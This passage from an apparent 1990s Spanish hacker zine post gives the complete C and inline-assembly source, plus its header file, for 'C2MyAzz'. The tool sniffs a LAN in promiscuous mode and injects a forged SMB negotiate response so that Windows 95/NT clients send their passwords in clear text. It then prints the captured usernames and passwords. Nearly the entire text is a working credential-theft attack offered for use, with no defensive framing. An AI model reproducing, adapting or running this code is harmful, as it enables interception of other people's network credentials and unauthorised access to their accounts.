- void _loadds _far grabit();
-
-
- // Global data
- void (_far * LSLInitEntryPt)(); //ptr to func that returns a ptr
- InfoBlock LSLInfoBlock; // LSL Info block - 2 ptrs
- RxNode Rnode;
- u16 BoardNum;
- ODIStat Rtn;
- void (_far * LSLProtocolSupportEntryPt)(); // ptr LSL funct
- void (_far * LSLGenServicesEntryPt )();
- void (_far * MLIDSupportEntryPt)();
- void (_far * MLIDControlEntryPt)();
- u8 _far * signature;
- union REGS regsin;
- union REGS regsout;
- struct SREGS segs;
- configtbl cfgtab;
- stattbl stattab;
- EventCB XmitECB=3d{0};
- u8 immAddr[6];
- EventCB _far * ECB;
- LookAhead _far * LkAhead;
- IPpac _far * pacptr;
- u16 CurEntry =3d 0; // index for big buffer
- IPInfo Data [MAXENTRIES]; // big buffer for captured data
- u16 DataEnd;
- u8 sendOK;
- u8 getpkt;
- EventCB _far * RcvECB;
-
- //*************************************************************************
- //
- // Build CntrlEntryPt as required by LSL.
- // upon entry:
- // bx =3d function number (0-8)
- // cx =3d parameter as required by bx
- // es:si =3d ptr as required by bx
- // upon exit:
- // ax =3d completion code ( 0 =3d successful)
- // es:si =3d as required by bx
- // registers DS BP ES SI SS SP preserved
- //
- //*******************************************************************
-
- void _loadds _far CntrlEntryPt ()
- {
- _asm
- {
- mov ax, 0 ; preset AX to success
-
- test bx, 0
- je getcfg
-
- test bx, 1
- je getstat
-
- test bx, 2
- je LSLbind
-
- test bx, 3
- je unbind
-
- test bx, 4
- je dereg
-
- test bx, 5
- je promis
-
- test bx, 6
- je reserve
-
- test bx, 7
- je reserve
-
- test bx, 8
- je manage
-
- jmp error
-
- getcfg:
- mov ax, SEG cfgtab
- mov es,ax
- mov ax,0
- mov si, OFFSET cfgtab
- jmp goback
-
- getstat:
- mov ax,SEG stattab
- mov es,ax
- mov ax,0
- mov si, OFFSET stattab
- jmp goback
-
- LSLbind:
- mov ax, 08009h
- jmp goback
-
- unbind:
- jmp goback
-
- dereg:
- jmp goback
-
- promis:
- jmp goback
-
- reserve:
- jmp error
-
- manage:
- jmp goback
-
- error:
- mov ax, 08008h ; bad command
- jmp goback
-
- goback:
-
- }
- }
-
- //*****************************************************************
- //
- // Rx ISR - called by LSL
- //
- // Grabs the lookahead buffer from LSL and passes it to Stuffit
- // If the packet is of intereset, call LSL and get an ECB from
- // LSL's pool, sends to grabit
- //
- //
- //******************************************************************
-
- #pragma check_stack(off)
-
- void _loadds _far RxISR ()
- {
- _asm
- {
- mov word ptr LkAhead, di
- pop ax ; get callers ds into ax
- push ax
- mov word ptr LkAhead+2, ax
- push di
- push si
- push es
-
- }
- // Check to see if we want this packet
- getpkt=3d(stuffit ((IPpac _far *)LkAhead->DataPtr, &LkAhead->ProtocolID,
- &(LkAhead->MediaHdr[6])));
-
- if(getpkt =3d=3d 0)
- _asm
- {
- pop es
- pop si
- pop di
- mov ax, 8001h ; pass to next scanner
- or ax, ax ; set ZF based on value of AX
- }
- else
- {
- _asm
- {
- mov bx,0 ;Get an ECB from LSL's pool
- call far ptr LSLProtocolSupportEntryPt
- mov word ptr[RcvECB],si
- mov word ptr[RcvECB+2],es
- }
-
- // Fill out the necessary fields in the ECB
-
- RcvECB->BoardNum=3d0;
- RcvECB->ProtocolID[0]=3d0;
- RcvECB->ProtocolID[1]=3d0;
- RcvECB->ProtocolID[2]=3d0;
- RcvECB->ProtocolID[3]=3d0;
- RcvECB->ProtocolID[4]=3d8;
- RcvECB->ProtocolID[5]=3d0;
- RcvECB->ProtocolNum=3d0xABCD;
- RcvECB->DataLen=3d1480;
- RcvECB->Frag1Len=3d1480;
- RcvECB->FragCnt=3d1;
- RcvECB->ECBISR=3dgrabit;
- RcvECB->Frag1Addr=3d((u8 far *)((void far
- *)RcvECB)+(((sizeof(EventCB)+3)>> 2) << 2));
-
- _asm
- {
- add sp,4
- mov word ptr ss:[bp-4],si
- xor ax, ax ;clear AX and reset ZF
- pop di
- }
- }
- }
-
- //*************************************************************
- // Init - checks for supporting software and hardware
- //
- //*************************************************************
-
- void init()
- {
- u16 i;
- u16 ComCode;
-
- //*****************************************************************
- // Initialization routines
- // Check to see if LSL is loaded (int vector 2F is viable)
-
- regsin.x.ax =3d 0x352f;
-
- intdosx ( «sin, «sout, &segs);
-
- if (((regsout.x.bx | segs.es ) =3d=3d 0) || ((regsout.x.bx & segs.es )
- =3d=3d -1))
- {
- printf ("C2MyAzz: LSL not loaded. Exiting.\n ");
- exit;
- }
-
- // Locate the LSL intial entry pt. Note that we're scanning
- // for TSRs, starting at C0 to FF.
-
- for ( i =3d 0xC0; i < 0xFF; i ++)
- {
- regsin.h.ah =3d i;
- regsin.h.al =3d 0;
-
- int86x (0x2F, «sin, «sout, &segs);
-
- if ( regsout.h.al =3d=3d 0xFF) // something is installed, check it
- {
- (long)signature =3d (long)regsout.x.si ; // ptr to LSL id
- (long)signature =3d ((long)segs.es << 16) | (long)signature;
-
- if (_fstrncmp ((u8 _far *)signature, (u8 _far *)"LINKSUP$", 8)) //
- check for LSL id
- continue; // not LSL, continue
- else
- {
- (long)LSLInitEntryPt =3d (long)regsout.x.bx ;
- (long)LSLInitEntryPt =3d (long)LSLInitEntryPt |
- ((long)regsout.x.dx << 16);
- break; // got LSL exit loop
- }
- }
- }
-
- if (!LSLInitEntryPt)
- {
- printf ("C2MyAzz: LSL is not loaded \n ");
- exit;
- }
-
- LSLInfoBlock.LSLAPI =3d 0;
-
- // call the LSL initial entry pt to fill in the LSL info block
-
- _asm
- {
- push es
- push ds
- mov ax, SEG LSLInfoBlock
- mov es, ax
- mov si, OFFSET LSLInfoBlock ; ES:SI =3d ptr to info block
- mov bx, 4 ; bx =3d req code 4
- call far ptr LSLInitEntryPt ; get LSL info block
- pop ds
- pop es
- }
-
- // move function ptrs from info block (optional)
-
- LSLProtocolSupportEntryPt =3d (void (_far *)())LSLInfoBlock.LSLAPI;
- LSLGenServicesEntryPt =3d (void (_far *)())LSLInfoBlock.GSAPI;
- MLIDSupportEntryPt =3d (void (_far *)())LSLInfoBlock.MLIDAPI;
- // Assume that we're only dealing with one board
- BoardNum =3d 0;
-
- // Get MLID Control Entry point for later use
-
- _asm
- {
- push es
- push ds
- mov ax, BoardNum
- mov bx, 012h ; Get MLID Control Entry Pt
- call far ptr LSLProtocolSupportEntryPt
- mov word ptr [MLIDControlEntryPt], si
- mov word ptr [MLIDControlEntryPt +2], es
- pop ds
- pop es
- mov ComCode, ax
- }
-
- if (ComCode !=3d 0)
- {
- printf ("C2MyAzz: cannot get MLID control entry pt rtn =3d %x. Is your
- MLID loaded? \n", ComCode);
- exit;
- }
-
- // Set the look ahead size of MLID to 128 bytes
- _asm
- {
- push es
- push ds
- mov ax, BoardNum
- mov bx, 9 ;set look ahead size
- mov cx, 80h
- call far ptr MLIDControlEntryPt
- pop ds
- pop es
- mov ComCode, ax
- }
-
- if (ComCode !=3d 0)
- {
- printf ("C2MyAzz: cannot set look ahead size to 128 rtn =3d %x \n",
- ComCode);
- exit;
- }
-
- printf ("C2MyAzz: Lookahead set to 128 bytes \n");
-
- // Register the RX prescanner stack with LSL
- // init RX Node CB
-
- Rnode.boardnum =3d BoardNum;
- Rnode.position =3d LAST_MUST;
- Rnode.ISR =3d &RxISR;
- Rnode.StackID =3d 0xABCD;
- Rnode.ControlEntryPt =3d &CntrlEntryPt;
- Rnode.PacFilterMsk =3d 0xFFFF;
-
- _asm
- {
- push es
- push ds
- mov ax,ds
- mov es,ax
- mov si, OFFSET Rnode
- mov bx, 01Ch ;register the RX prescanner
- call far ptr LSLProtocolSupportEntryPt
- pop ds
- pop es
- mov ComCode, ax
- }
-
- if (ComCode !=3d 0)
- {
- printf("C2MyAzz: cannot register RX prescanner rtn =3d %x \n", ComCode);
- exit;
- }
-
- printf("C2MyAzz: Receive prescanner now registered \n");
-
- // Enable promiscuous mode on the adapter so the we will receive all packets
-
- _asm
- {
- push es
- push ds
- mov ax, BoardNum
- mov bx, 0ah ;set promiscuous mode
- mov cx, 1 ;all frames
- call far ptr MLIDControlEntryPt
- pop ds
- pop es
- mov ComCode, ax
- }
-
- if (ComCode !=3d 0)
- {
- printf("C2MyAzz: cannot set board in promiscuous mode rtn =3d %x \n",
- ComCode);
- printf(" Does your board support promiscuous mode? \n");
- exit;
- }
- printf ("C2MyAzz: Board now in promiscuous mode \n");
-
- // Reset prescan stack to accept all frames
-
- i=3dRnode.StackID; // Cheat the assembler
- _asm
- {
- push es
- push ds
- mov ax, BoardNum
- mov bx, 02bh ;modify stack filter
- mov cx, i
- mov dx, 0ffffh ;take everything
- call far ptr LSLProtocolSupportEntryPt
- pop ds
- pop es
- mov ComCode, ax
- }
-
- if (ComCode !=3d 0)
- {
- printf("C2MyAzz: cannot set stack filter rtn =3d %x \n", ComCode);
- exit;
- }
- }
-
- //*****************************************************************************
- // Uninit - deregisters the prescan stack
- //*****************************************************************************
-
- void uninit(void)
- {
- u16 ComCode;
-
- _asm
- {
- push es
- push ds
- mov ax,ds
- mov es,ax
- mov si, OFFSET Rnode
- mov bx, 01Fh ;Deregister the RX prescanner
- call far ptr LSLProtocolSupportEntryPt
- pop ds
- pop es
- mov ComCode, ax
- }
-
- if (ComCode !=3d 0)
- {
- printf("C2MyAzz: cannot deregister RX prescanner rtn =3d %x \n",
- ComCode);
- return;
- }
- }
-
- u8 stuffit(IPpac _far *pacptr, PID _far *pid, u8 _far *immAddr)
- {
- //Check to see if this is an SMB within IP
- if (_fstrncmp((void far *)pacptr->x.SMB.IDString, (void far *) "SMB", 3)
- !=3d 0)
- return(0);
-
- //Is this packet a SMB Neg Request?
- if(pacptr->x.SMB.FunctionCode < 0x72)
- return(0);
-
- //Is this packet creating a server connection?
- if(pacptr->x.SMB.FunctionCode > 0x73)
- return(0);
-
- //Must be a packet of interest.
- return(1);
- }
-
- void _loadds _far grabit(void)
- {
- //Grab what we need from the packet
- if (CurEntry < MAXENTRIES) // test for overflow
- {
- pacptr=3d(IPpac _far *)RcvECB->Frag1Addr;
-
- Data[CurEntry].size=3d((pacptr->length >> 8) & 0x00FF) |
- ((pacptr->length << 8)& 0xFF00);
- _fmemmove((void far *) Data[CurEntry].data, (void far *) pacptr,
- Data[CurEntry].size);
- _fmemmove((void far *) &Data[CurEntry].pid, (void far *)
- RcvECB->ProtocolID, sizeof(PID));
- _fmemmove((void far *) Data[CurEntry].immAddr, (void far *)
- RcvECB->ImmAddr, 6);
- _fmemmove((void far *) &Data[CurEntry].type, (void far
- *)pacptr->x.SMB.FunctionCode, 2);
-
- _asm
- {
- mov bx,1 ;Return ECB to LSL pool
- mov si, word ptr[RcvECB]
- mov es, word ptr[RcvECB+2]
- call far ptr LSLProtocolSupportEntryPt
- xor ax, ax ;clear AX and reset ZF
- }
-
- CurEntry++; // bump counter for next packet
- }
- }
-
- #pragma check_stack(on)
-
- //*************************************************************
- // Empty transmit complete ESR for LSL
- //
- //*************************************************************
-
- void _loadds _far TXCompleteESR()
- {
- // Stack is ready for the next packet
- sendOK=3d0;
- }
-
- //*************************************************************
- //
- // Main processing of the packet occurs here.
- // Setup the forged ECB, then loop until a packet comes in
- //
- //*************************************************************
-
- main ()
- {
- IPpac *ECBData;
- u8 buffer[256];
- ODIStat Rtn;
- u16 i;
- u16 ComCode;
- u16 j;
- ODIStat Stat;
- int ch;
- u32 SourceAddress;
- u32 DestAddress;
- u16 sourcePort;
- u16 destPort;
- u32 seqNum;
- u32 ackNum;
- u32 nextseqNum;
- u16 MuxID;
- u16 TreeID;
- u16 ProcID;
- u8 type;
- PID pid;
- char password[24];
- char username[16];
- u8 commandresp;
- u32 sum;
- u16 *ptr;
- u16 pktlen;
- u8 foundpw;
- u8 pwlen;
- u8 wstype; // 0 if 95, 1 if NT
-
- printf("C2MyAzz - Tricks Microsoft Networking clients to send their password
- as\n");
- printf(" clear text. Displays a username/password combination.
- \n");
- printf(" C2MyAzz requires LSL and a promiscuous mode LAN
- driver.\n\n");
- printf(" Use at your own risk. Read Microsoft's CIFS
- documentation\n");
- printf(" for more NT security holes. Copyright(c) 1997 \n\n\n");
-
- // Setup for prescan
- init();
- printf("C2MyAzz: All packets will now be received\n");
- printf("C2MyAzz: Ready to scan for passwords\n");
- printf("C2MyAzz: (press any key to exit)\n\n\n");
-
- // Setup some of the static ECB information so that we don't waste cycles
- // when processing the packets
-
- XmitECB.Frag1Addr =3d buffer;
- ECBData =3d (IPpac *)buffer;
- XmitECB.DataLen =3d 105;
- XmitECB.ECBISR =3d TXCompleteESR;
- XmitECB.Frag1Len =3d 105;
- XmitECB.BoardNum =3d BoardNum;
- XmitECB.FragCnt =3d 1;
- XmitECB.NxtECB =3d (void far *) 0;
- XmitECB.PreECB =3d (void far *) 0;
-
- ECBData->version=3d0x45;
- ECBData->type=3d0x00;
- ECBData->length=3d0x6900; // Must byte-swap all words
- ECBData->identification=3d0xEEEE; // Should be ignored since no
- fragging
- ECBData->flags1=3d0x0040;
- ECBData->ttl=3d0x80;
- ECBData->protocol=3d0x06;
- ECBData->window=3d0x5221;
- ECBData->dataOffset=3d0x50;
- ECBData->flags2=3d0x18;
- ECBData->pad1=3d0x00;
- ECBData->nbtype=3d0x00;
- ECBData->nbflags=3d0x00;
- ECBData->nblength=3d0x4100;
-
- // Setup the ECB data for a raw send. We're building the SMB packet to
- spoof
- // client into sending their password clear text on the wire. Most of the
- // information was taken from an SMB client accessing our local SAMBA server
-
- ECBData->x.RAW.buf[0]=3d0xff;
- ECBData->x.RAW.buf[1]=3d0x53;
- ECBData->x.RAW.buf[2]=3d0x4d;
- ECBData->x.RAW.buf[3]=3d0x42;
- ECBData->x.RAW.buf[4]=3d0x72;
- ECBData->x.RAW.buf[5]=3d0x00;
- ECBData->x.RAW.buf[6]=3d0x00;
- ECBData->x.RAW.buf[7]=3d0x00;
- ECBData->x.RAW.buf[8]=3d0x00;
- ECBData->x.RAW.buf[9]=3d0x81;
- ECBData->x.RAW.buf[10]=3d0x00;
- ECBData->x.RAW.buf[11]=3d0x00;
- ECBData->x.RAW.buf[12]=3d0x00;
- ECBData->x.RAW.buf[13]=3d0x00;
- ECBData->x.RAW.buf[14]=3d0x00;
- ECBData->x.RAW.buf[15]=3d0x00;
- ECBData->x.RAW.buf[16]=3d0x00;
- ECBData->x.RAW.buf[17]=3d0x00;
- ECBData->x.RAW.buf[18]=3d0x00;
- ECBData->x.RAW.buf[19]=3d0x00;
- ECBData->x.RAW.buf[20]=3d0x00;
- ECBData->x.RAW.buf[21]=3d0x00;
- ECBData->x.RAW.buf[22]=3d0x00;
- ECBData->x.RAW.buf[23]=3d0x00;
-
- // We need the Tree ID, Process ID, and Mux ID from the look ahead buffer
- // since these fields change on every connection
- //ECBData->x.RAW.buf[24]=3d0x00; Tree ID
- //ECBData->x.RAW.buf[25]=3d0x00;
- //ECBData->x.RAW.buf[26]=3d0xbf; Process ID
- //ECBData->x.RAW.buf[27]=3d0x1b;
-
- ECBData->x.RAW.buf[28]=3d0x00;
- ECBData->x.RAW.buf[29]=3d0x00;
-
- //ECBData->x.RAW.buf[30]=3d0x81; Mux ID
- //ECBData->x.RAW.buf[31]=3d0x40;
-
- ECBData->x.RAW.buf[32]=3d0x0D;
- ECBData->x.RAW.buf[33]=3d0x02; // Dialect 2 for 95 ws, Dialect 5 for NT
- ECBData->x.RAW.buf[34]=3d0x00;
- ECBData->x.RAW.buf[35]=3d0x01;
- ECBData->x.RAW.buf[36]=3d0x00;
- ECBData->x.RAW.buf[37]=3d0x04;
- ECBData->x.RAW.buf[38]=3d0x11;
- ECBData->x.RAW.buf[39]=3d0x02;
- ECBData->x.RAW.buf[40]=3d0x00;
- ECBData->x.RAW.buf[41]=3d0x01;
- ECBData->x.RAW.buf[42]=3d0x00;
- ECBData->x.RAW.buf[43]=3d0x03;
- ECBData->x.RAW.buf[44]=3d0x00;
- ECBData->x.RAW.buf[45]=3d0xB0;
- ECBData->x.RAW.buf[46]=3d0x8B;
- ECBData->x.RAW.buf[47]=3d0xA1;
- ECBData->x.RAW.buf[48]=3d0x00;
- ECBData->x.RAW.buf[49]=3d0x2B;
- ECBData->x.RAW.buf[50]=3d0x52;
- ECBData->x.RAW.buf[51]=3d0x5C;
- ECBData->x.RAW.buf[52]=3d0x22;
- ECBData->x.RAW.buf[53]=3d0xA4;
- ECBData->x.RAW.buf[54]=3d0x01;
- ECBData->x.RAW.buf[55]=3d0x00;
- ECBData->x.RAW.buf[56]=3d0x00;
- ECBData->x.RAW.buf[57]=3d0x00;
- ECBData->x.RAW.buf[58]=3d0x00;
- ECBData->x.RAW.buf[59]=3d0x00;
- ECBData->x.RAW.buf[60]=3d0x00;
- ECBData->x.RAW.buf[61]=3d0x00;
- ECBData->x.RAW.buf[62]=3d0x00;
- ECBData->x.RAW.buf[63]=3d0x00;
- ECBData->x.RAW.buf[64]=3d0x00;
- ECBData->x.RAW.buf[65]=3d0x00;
- ECBData->x.RAW.buf[66]=3d0x00;
- ECBData->x.RAW.buf[67]=3d0x00;
- ECBData->x.RAW.buf[68]=3d0x00;
- ECBData->x.RAW.buf[69]=3d0x00;
- ECBData->x.RAW.buf[70]=3d0x00;
- ECBData->x.RAW.buf[71]=3d0x00;
- ECBData->x.RAW.buf[72]=3d0x00;
- ECBData->x.RAW.buf[73]=3d0x00;
- ECBData->x.RAW.buf[74]=3d0x00;
- ECBData->x.RAW.buf[75]=3d0x00;
- ECBData->x.RAW.buf[76]=3d0x00;
- ECBData->x.RAW.buf[77]=3d0x00;
- ECBData->x.RAW.buf[78]=3d0x00;
- ECBData->x.RAW.buf[79]=3d0x00;
- ECBData->x.RAW.buf[80]=3d0x00;
- ECBData->x.RAW.buf[81]=3d0x00;
- ECBData->x.RAW.buf[82]=3d0x00;
- ECBData->x.RAW.buf[83]=3d0x00;
- ECBData->x.RAW.buf[84]=3d0x00;
- ECBData->x.RAW.buf[85]=3d0x00;
- ECBData->x.RAW.buf[86]=3d0x00;
- ECBData->x.RAW.buf[87]=3d0x00;
- ECBData->x.RAW.buf[88]=3d0x00;
- ECBData->x.RAW.buf[89]=3d0x00;
- ECBData->x.RAW.buf[90]=3d0x00;
- ECBData->x.RAW.buf[91]=3d0x00;
- ECBData->x.RAW.buf[92]=3d0x00;
- ECBData->x.RAW.buf[93]=3d0x00;
- ECBData->x.RAW.buf[94]=3d0x00;
- ECBData->x.RAW.buf[95]=3d0x00;
- ECBData->x.RAW.buf[96]=3d0x00;
- ECBData->x.RAW.buf[97]=3d0x00;
- ECBData->x.RAW.buf[98]=3d0x00;
- ECBData->x.RAW.buf[99]=3d0x00;
- ECBData->x.RAW.buf[100]=3d0x00;
- ECBData->x.RAW.buf[101]=3d0x00;
- ECBData->x.RAW.buf[102]=3d0x00; //last byte
- ECBData->x.RAW.buf[103]=3d0x01;
-
- // Setup some of the variables that we'll use later
- foundpw=3d0;
- sendOK=3d0;
- wstype=3d0;
-
- do
- {
- do
- {
- // Loop until someone hits a key or until we have a packet to
- process
- if(kbhit())
- {
- printf("C2MyAzz: Exiting\n");
- uninit();
- exit(0);
- }
- } while (CurEntry =3d=3d 0); //Loop until we get a packet
-
- // Grab data out of packet to determine whether or not to proceed
- type =3d (u8) (((IPpac *)(Data[0].data))->x.SMB.FunctionCode);
- commandresp =3d (u8) (((IPpac *)(Data[0].data))->x.USERPWNT.cmdresp);
-
- // NT and 95 use different username / password combinations. Check
- // to see if the client is a 95 or NT workstation. Note that we're checking
- // to see if the workstation supports long filenames (0x3 =3d NT), or DOS
- // 8.3 only (0x0 =3d 95). This is an assumption based on observation. We
- // could use additional information in the packet to determine NT or 95..
-
- if((((IPpac *)(Data[0].data))->x.SMB.Flags2) =3d=3d 0x3)
- wstype=3d1; // Looks like an NT Workstation
- else
- wstype=3d0; // Otherwise, a Windows 95 machine
-
- // If this is a SMB NEG PROT and this is a request, grab information
- // for the transmit ECB
- if((type =3d=3d 0x72) && (!(commandresp & 0x80)))
- {
- SourceAddress=3d(u32)(((IPpac *)(Data[0].data))->srcaddr);
- DestAddress=3d(u32)(((IPpac *)(Data[0].data))->destaddr);
- sourcePort=3d(u16)(((IPpac *)(Data[0].data))->srcport);
- destPort=3d(u16)(((IPpac *)(Data[0].data))->destport);
- seqNum=3d(u32)(((IPpac *)(Data[0].data))->seqnumber);
- ackNum=3d(u32)(((IPpac *)(Data[0].data))->acknumber);
- MuxID =3d (u16) (((IPpac *)(Data[0].data))->x.SMB.muxId);
- TreeID =3d (u16) (((IPpac *)(Data[0].data))->x.SMB.TreeID);
- ProcID =3d (u16) (((IPpac *)(Data[0].data))->x.SMB.ProcessID);
- pktlen =3d (u16) (((IPpac *)(Data[0].data))->length);
- memmove(&pid, &Data[0].pid, sizeof(PID));
- memmove(&immAddr, &Data[0].immAddr, sizeof(immAddr));
- memmove(XmitECB.ImmAddr, (void *) immAddr, 6);
- memmove(&XmitECB.ProtocolID, &pid, sizeof(PID));
- *((u32 *)(&(ECBData->destaddr)))=3dSourceAddress;
- *((u32 *)(&(ECBData->srcaddr)))=3dDestAddress;
- *((u16 *)(&(ECBData->destport)))=3dsourcePort;
- *((u16 *)(&(ECBData->srcport)))=3ddestPort;
- *((u32 *)(&(ECBData->seqnumber)))=3dackNum;
- *((u16 *)(&(ECBData->x.RAW.buf[24])))=3dTreeID;
- *((u16 *)(&(ECBData->x.RAW.buf[26])))=3dProcID;
- *((u16 *)(&(ECBData->x.RAW.buf[30])))=3dMuxID;
-
- if(wstype =3d=3d 1)
- ECBData->x.RAW.buf[33]=3d0x05; //NT Workstation uses dialect 5
- else
- ECBData->x.RAW.buf[33]=3d0x02; //95 Workstation uses dialect 2
-
- // Need to calculate the IP and TCP headers. Start by setting up for
- // grabbing the sequence numbers of the previous packets, and ca
- seqNum=3dflipbyte32(seqNum);
- pktlen=3dflipbyte16(pktlen);
-
- // Ack number is last packet + data - header
- nextseqNum=3d(seqNum + pktlen - 40);
- nextseqNum=3dflipbyte32(nextseqNum);
- *((u32 *)(&(ECBData->acknumber)))=3dnextseqNum;
- seqNum=3dflipbyte32(seqNum);
- pktlen=3dflipbyte16(pktlen);
-
- // Calculate the IP and TCP checksums
- // Initially set the CRCs to zero
- ECBData->headerCRC=3d0x0000;
- ECBData->tcpCRC=3d0x0000;
- sum=3d0;
-
- // Start by adding up all the bytes in IP header
- ptr=3d(u16 *)ECBData;
- for(j=3d0;j<10;j++)
- sum+=3d(ptr[j]);
-
- // Add any overflow into the sum
- sum=3d(sum>>16)+(sum & 0xffff);
- sum+=3d(sum>>16);
- // Take 1's complement
- ECBData->headerCRC=3d~sum;
-
- // Calculate the TCP Checksum
- // Note that we need to first create a pseudo-header for
- // use in the TCP checksum. For more information, see page
- // 186 of "Internetworking with TCP/IP" by Comer
- sum=3d0; // Clear sum from last calculation
- sum+=3dptr[6]; // Add up the IP address
- sum+=3dptr[7];
- sum+=3dptr[8];
- sum+=3dptr[9];
- sum+=3d0x0600; // Add in the protocol ID for TCP in IP
- sum+=3d0x5400; // Add in the length of TCP data
- for(j=3d10;j<74;j++) // Add up the bytes in the ECB
- sum+=3d(ptr[j]);
-
- // Add any overflow into the sum
- sum=3d(sum>>16)+(sum & 0xffff);
- sum+=3d(sum>>16);
-
- // Take 1's complement
- ECBData->tcpCRC=3d~sum;
-
-
- if((foundpw =3d=3d 0) && (sendOK =3d=3d 0))
- {
- // SendOK is reset after the packet is sent
- sendOK=3d1;
- // Pass the ECB to LSL for a raw send
- _asm
- {
- push es
- push ds
- mov ax, SEG XmitECB
- mov es, ax ;Whew! Lots of work just to get
- mov si, OFFSET XmitECB ;a packet on the wire.
- mov bx, 0ch ;Let's transmit this tiresome
- hag
- call far ptr LSLProtocolSupportEntryPt
- mov ComCode, ax
- pop ds
- pop es
- }
- }
- else
- foundpw=3d0;
- } // End of packet send routine
-
- // If we've received the client's password, display it on the screen
- if(type =3d=3d 0x73)
- {
- memmove(password, ((IPpac*)(Data[0].data))->x.USERPWNT.password, 32);
- memmove(username, ((IPpac*)(Data[0].data))->x.USERPW95.username, 15);
- pwlen =3d (u8) (((IPpac *)(Data[0].data))->x.USERPWNT.pwlength);
-
- // Since the password could be null, check to see if it appears
- // to be a valid password. Is the first character of the password
- // a valid ASCII character?
- if((password[0] >=3d 0x21) && (password[0] <=3d 0x5D))
- {
- // If we spoof every packet, we won't connect to IPC to find the
- // shares of the domain. By spoofing every other packet, we'll let
- // the connection go through after a retry. This approach will
- // present the user with an error screen after attempting to connect
- // to the doamin, but if the user retries, we'll backoff and let
- // the user through
- foundpw=3d1;
- if(wstype =3d=3d 1)
- printf("User %s password is %s\n",&password[strlen(password)+1],
- password);
- else
- {
- // Need to null terminate the strings
- password[23]=3d0x00;
- username[15]=3d0x00;
- printf("User %s password is %s\n", username, password);
- }
- }
- } // End of password display routine
-
- // Now that we've processed the packet, clear the buffer of the processed
- // packet. Note that we're disabling interrupts because we might
- // get stomped with a new packet while we're clearing out the old packet
-
- _disable();
- memmove(Data, &Data[1],(sizeof(Data) - sizeof(IPInfo)));
- CurEntry--;
- _enable();
-
- } while (1);
- }
-
- ------------ FIN -------------------------------------------------------------
-
- Ahora te pongo el .h
-
- ------------ Codigo Fuente ---------------------------------------------------
-
- //
- //
- //
-
- #define flipbyte32( x ) ((u32) \
- ((((u32)(x) & 0x000000FFL) << 24) | \
- (((u32)(x) & 0x0000FF00L) << 8) | \
- (((u32)(x) & 0x00FF0000L) >> 8) | \
- (((u32)(x) & 0xFF000000L) >> 24)))
-
- #define flipbyte16( x ) ((u16) \
- ((((u16)(x) & 0x00FF) << 8) | \
- (((u16)(x) & 0xFF00) >> 8)))
-
- typedef signed char s8;
- typedef unsigned char u8;
- typedef unsigned int u16;
- typedef long unsigned int u32;
-
- typedef struct
- { u32 lo;
- u32 hi;
- } u64;
-
- typedef struct
- { u8 addr [8];
- } Addr;
-
- typedef struct
- { u8 ID[6];
- } PID;
-
- typedef u32 ProtocolNumber;
-
- typedef enum
- { ODI_SUCCESS =3d 0,
- ODI_OUT_OF_RESOURCES =3d -119,
- ODI_NO_MORE_ITEMS =3d -122,
- ODI_FAIL =3d -124
- } ODIStat;
-
- typedef enum
- { FIRST_MUST,
- FIRST_NEXT,
- LOAD_DEPENDS,
- LAST_NEXT,
- LAST_MUST,
- } CHNPOS;
-
- typedef struct
- {
- u8 version;
- u8 type;
- u16 length;
- u16 identification;
- u16 flags1;
- u8 ttl;
- u8 protocol;
- u16 headerCRC;
- u32 srcaddr;
- u32 destaddr;
-
- //Start TCP Header
-
- u16 srcport;
- u16 destport;
- u32 seqnumber;
- u32 acknumber;
- u8 dataOffset;
- u8 flags2;
- u16 window;
- u16 tcpCRC;
- u16 pad1;
-
- //Start NB Header
-
- u8 nbtype;
- u8 nbflags;
- u16 nblength;
-
- union
- {
- struct
- {
- u8 Reserved0;
- u8 IDString[3];
- u8 FunctionCode;
- u8 Reserved1[4];
- u8 Flags1;
- u16 Flags2;
- u8 Reserved2[12];
- u16 TreeID;
- u16 ProcessID;
- u16 Reserved3;
- u16 muxId;
- } SMB;
- struct
- {
- u8 buf[32];
- } RAW;
- struct
- {
- u8 reserved1[9];
- u8 cmdresp;
- u8 reserved[43];
- u8 pwlength;
- u8 reserved2;
- u8 password[32];
- }USERPWNT;
- struct
- {
- u8 reserved1[9];
- u8 cmdresp;
- u8 reserved[43];
- u8 pwlength;
- u8 reserved2;
- u8 password[24];
- u8 username[16];
- }USERPW95;
- } x;
-
- } IPpac;
-
- // template for Info Block
-
- typedef u32 Func;
-
- typedef struct
- {
- void (_far * LSLAPI )();
- void (_far * GSAPI )();
- void (_far * MLIDAPI)();
- } InfoBlock;
-
- // template for info copied from IP packet
-
- typedef struct
- {
- u8 immAddr[6];
- u8 type;
- u16 size;
- PID pid;
- char data[1500];
- } IPInfo;
-
- typedef struct ECBs
- {
- void _far * NxtECB;
- void _far * PreECB;
- u16 Status;
- void (_far * ECBISR)();
- u16 ProtocolNum;
- u8 ProtocolID[6];
- u16 BoardNum;
- u8 ImmAddr[6];
- u8 ECBDrvrWkSpace[4];
- u16 ECBPrtclWkSpace[4];
- u16 DataLen;
- u16 FragCnt;
- u8 _far * Frag1Addr;
- u16 Frag1Len;
- } EventCB;
-
- typedef struct
- {
- u8 _far * MediaHdr; // 4
- u8 _far * DataPtr; // 4
- u16 DataLen; // 2
- PID ProtocolID; // 6
- u16 BoardNum; // 2
- u16 DataSize; // 2
- PID ImmAddr; // 6
- u16 PacAttrib; // 2
- u16 DestType; // 2
- u16 StartOffset; // 2
- u8 PriorityLvl; // 1
- u8 Reserved; // 1
- } LookAhead;
-
- typedef struct RxChainNode
- {
- u32 nextlink; // 4
- u16 boardnum; // 2
- u16 position; // 2
- void (_far _loadds * ISR)(); // 4
- void (_far * ControlEntryPt)(); // 4
- u16 StackID; // 2
- u16 PacFilterMsk; // 2
- u32 Reserved; // 4
- } RxNode; // 24 total
-
- typedef struct
- {
- u8 cmajver;
- u8 cminver;
- u32 longname;
- u32 shortname;
- u8 pmajver;
- u8 pminver;
- u8 reserved[16];
- } configtbl;
-
- typedef struct
- {
- u8 majver;
- u8 minver;
- u16 ctr;
- u32 mask;
- u32 txpac;
- u32 rxpac;
- u32 nopac;
- u16 cusctr;
- } stattbl;
-
- ------------ FIN -------------------------------------------------------------
-
- Bueno os dejo, por hoy, si por alguna casualidad un dia me apetece,
- mandare otro texto del nbtstat, explicandolo que protocolos hay que
- tener instalados, etc.
-
- ad10.
-
- P.D. Por problemas tecnicos hemos tenido que quitar la pagina, por lo
- cual estamos buscando nuevo server, aunque seguro que cogamos un dominio
- propio. Ya que para septiembre cambianos totalmente la pagina.
-
-
- {CyBoRg} -thPrOpHeT-
- SHG Security Group
-
- <------>
-
